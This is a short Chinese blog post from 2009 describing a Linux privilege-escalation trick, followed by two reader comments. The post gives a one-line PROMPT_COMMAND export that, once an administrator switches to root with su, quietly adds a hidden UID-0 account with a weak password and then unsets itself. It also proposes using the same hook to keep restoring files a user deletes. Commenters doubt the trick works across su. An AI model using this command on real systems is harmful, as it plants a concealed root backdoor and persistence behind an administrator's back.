利用BASH提权的技巧

2009/12/29 18:27 | 鬼仔 | 技术文章 | 占个座先

作者:xi4oyu

要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

看图:

随后你用su变成root,看看是否多了个用户呢

也可以建立用户删除不了的文件
比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了

Tags: , ,

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • bigCat | 2009-12-31 00:32 | #

    呃,用su和用su – 切用户跑的初始脚本不一样滴哟
    这个提权好YD…

    回复该留言
  • phoenix | 2016-05-06 15:24 | #

    这个不对吧,这个只是export给你当前账号了,你su是没有问题的,另外还有bigcat说的su和su -的区别。
    不过这个想法的确很YD

    回复该留言

发表评论